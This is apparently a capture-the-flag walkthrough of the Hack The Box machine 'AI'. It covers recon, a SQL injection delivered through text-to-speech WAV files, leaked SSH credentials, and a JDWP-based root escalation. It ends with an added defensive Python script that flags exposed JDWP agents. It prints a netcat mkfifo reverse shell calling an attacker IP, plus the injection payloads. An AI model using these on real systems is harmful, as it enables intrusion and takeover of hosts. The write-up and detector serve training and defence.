We start the box with the usual nmap -sC -sV -Pn -p- -oA ./AI 10.10.10.163
It appears that we have only SSH and HTTP running on their usual ports. Let's check the HTTP page and fire up gobuster while we look around manually.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.163/ -x php
To make matters more confusing, when you hover over that AI icon and select AI, you're asked to process a WAV file to make a query. Unless it's trying to use voice recog or some kind of stego, that's a new one on me.
Now we have some places to check. Checking out "intelligence.php" gives us a VERY useful table.
Amazingly, I was not too far off with the voice recognition comment. The page mentions that it is using the Male-US voice model with Microsoft, so after digging around MS's site for about an hour, I finally find this article. I just need to figure out how to get my text into a WAV format. Well, funny enough, there is a text2wave component of the festival package. Let's play around with it.
$ sudo apt-get install festival -y
$ echo "Is this thing on question mark" | text2wave -o test.wav
If you play the WAV file, it says EXACTLY what is echoed. So it actually says "question mark". I wonder how that's going to play with the query punctuation, but I suspect that's where the "AI" portion comes in. Let's try it out on the users table with both username and password.
$ echo "open single, quote, join, select, username from users, pound sign" | text2wave -o username.wav
$ echo "open single, quote, join, select, password from users, pound sign" | text2wave -o password.wav
Then upload those WAV files to the AI page. Below are screenshots of the results.
Well, hello there, alexa! It looks like we have some creds: alexa:H,Sq9t6}a<)?q93_ which will let us SSH into the box. Time to run LinEnum.sh and find our way to PrivEsc. As always, the LinEnum output is in the CTB file. Around line 743 (trust me, this crap gets boring to read, but it has the possibility of saving you DAYS of work trying to find it manually without the script), we find a nice section of Java Debug Wire Protocol information.
root 24722 18.5 5.5 3137572 110584 ? Sl 17:24 0:04 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start
That's straight from the CTB. So, JDWP is running on localhost:8000. I'm not great at Java debugging, but I know someone who is (thanks again, Raiden99!). The Java Debugger is hugely disappointing, especially since none of the alternatives to Oracle Java have it, and we can't connect to port 8000 and can't install it on the target. A quick Google search brings us to https://github.com/IOActive/jdwp-shellifier and with this we should be able to get a root shell. So, create your usual nc reverse shell script:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4444 >/tmp/f
Move it and the shellifier.py script to the TARGET box. Set up two nc listeners: one on your machine, and the other on 8005 on the target. Then execute the shellifier. Boom goes the dynamite and you've rooted the box.
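From the defender's side, the root cause here is a JDWP agent left enabled on a root-owned Tomcat, so the check worth automating is "which JVMs on this host were started with a debug agent, and who can reach it". The following is an added Python example (mine, not from the writeup or from jdwp-shellifier) that parses ps aux output for -agentlib:jdwp / -Xrunjdwp options and rates the exposure; the sample process lines are constructed, with the Tomcat one modelled on the command line quoted above.

```python
import re

# Constructed `ps aux` output (not from a real host). The second line is modelled
# on the Tomcat command line in the writeup; the others are made up for contrast.
SAMPLE_PS = """\
root 1 0.0 0.1 169000 12000 ? Ss 17:00 0:01 /sbin/init
root 24722 18.5 5.5 3137572 110584 ? Sl 17:24 0:04 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start
app 3100 0.2 2.0 2000000 40000 ? Sl 17:30 0:00 /usr/bin/java -agentlib:jdwp=transport=dt_socket,address=*:5005,server=y,suspend=n -jar /srv/app.jar
dev 4200 0.1 1.0 1500000 30000 ? Sl 17:31 0:00 /usr/bin/java -agentlib:jdwp=transport=dt_socket,address=localhost:9000,server=n -jar /srv/dev.jar
"""

# Matches both the modern -agentlib:jdwp=... form and the legacy -Xrunjdwp:... form.
JDWP_RE = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")

def parse_jdwp_opts(cmdline):
    """Return the jdwp agent's key=value options as a dict, or None if no agent is set."""
    m = JDWP_RE.search(cmdline)
    if not m:
        return None
    return dict(kv.partition("=")[::2] for kv in m.group(1).split(","))

def assess(opts):
    """Rate a parsed jdwp option set as (severity, reason)."""
    if opts.get("server", "n") != "y":
        return "info", "agent dials out to a debugger (server=n); nothing is listening"
    addr = opts.get("address", "")
    host, _, port = addr.rpartition(":")
    if host in ("*", "0.0.0.0"):
        return "high", f"debugger listening on all interfaces, port {port}"
    if host == "":
        # A bare port bound all interfaces before JDK 9 and localhost only since.
        return "high", f"bare port {addr}; binds all interfaces on JDK 8 and older"
    return "medium", f"debugger listening on {addr}; any local user can attach"

def scan_ps(ps_text):
    """Walk `ps aux` lines and report every JVM that was started with a jdwp agent."""
    findings = []
    for line in ps_text.splitlines():
        parts = line.split(None, 10)  # user pid %cpu %mem vsz rss tty stat start time command
        if len(parts) < 11:
            continue
        opts = parse_jdwp_opts(parts[10])
        if opts is None:
            continue
        severity, reason = assess(opts)
        findings.append({"user": parts[0], "pid": parts[1],
                         "severity": severity, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in scan_ps(SAMPLE_PS):
        print(f"[{f['severity']}] pid {f['pid']} ({f['user']}): {f['reason']}")
```

On a live host, pipe `ps aux` into scan_ps instead of SAMPLE_PS; the localhost:8000 case from this box rates "medium" because, as the writeup shows, a low-privileged local account is all it takes to attach to a root JVM.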
That's all, folks!